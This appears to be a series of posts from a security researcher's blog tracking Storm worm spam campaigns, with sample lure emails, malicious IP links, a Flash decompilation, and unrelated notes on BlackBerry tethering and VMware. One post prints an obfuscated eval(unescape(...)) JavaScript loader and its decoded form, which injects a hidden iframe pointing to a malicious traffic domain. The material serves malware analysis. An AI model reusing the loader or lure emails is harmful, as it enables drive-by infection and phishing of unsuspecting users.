Storm <3's You!

Storm (Nuwar, CME711, etc) just reminded me that Valentine's is less than a month away. I've gotten four recycled e-mails looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 & Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.

Subject: Our Love is Free
Body: When Love Comes Knocking http://69.212.48.3/

Subject: I Love Thee
Body: Words in my Heart http://24.1.116.187/

Subject: A Is For Attitude
Body: A Dream is a Wish http://222.107.37.211/

Subject: Eternity of Your Love
Body: The Moon & Stars http://68.57.210.178/

The webpage contains some URL encoded text that links to "with_love.exe"

'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with modem. If you don't know how, read the forum post that got me this far. The forum works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Ruby snippet for URI decoding

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Which this:

ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this:

"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Play that funky mus...stock spam, Storm

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Because there is no patch...

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab and antivirus companies but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/

Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/

Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/

Here's a text file of the javascript exploit code. Handle with care!

Kitties say Storm is better than catnip!

Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/

Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/

Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the the original file came from http://www.superlaugh.com/1/catnip.swf Both files were the same size but MD5's did not match.

movie 'catnip.swf' {
// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
frame 1 {
ifFrameLoaded (4) {
gotoAndPlay(3);
}
}
frame 2 {
gotoAndPlay(1);
}
movieClip 5 {
}
button 7 {
on (release) {
getURL('http://www.superlaugh.com', '_top');
}
}
movieClip 14 {
}
frame 125 {
gotoAndPlay(3);
}
}

The links on the page all go to SuperLaugh.exe which was caught by 70% of scan engines on Virus Total. Obfuscated Javascript was found at the bottom just like some previous versions. It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory but it did not allow browsing of directories.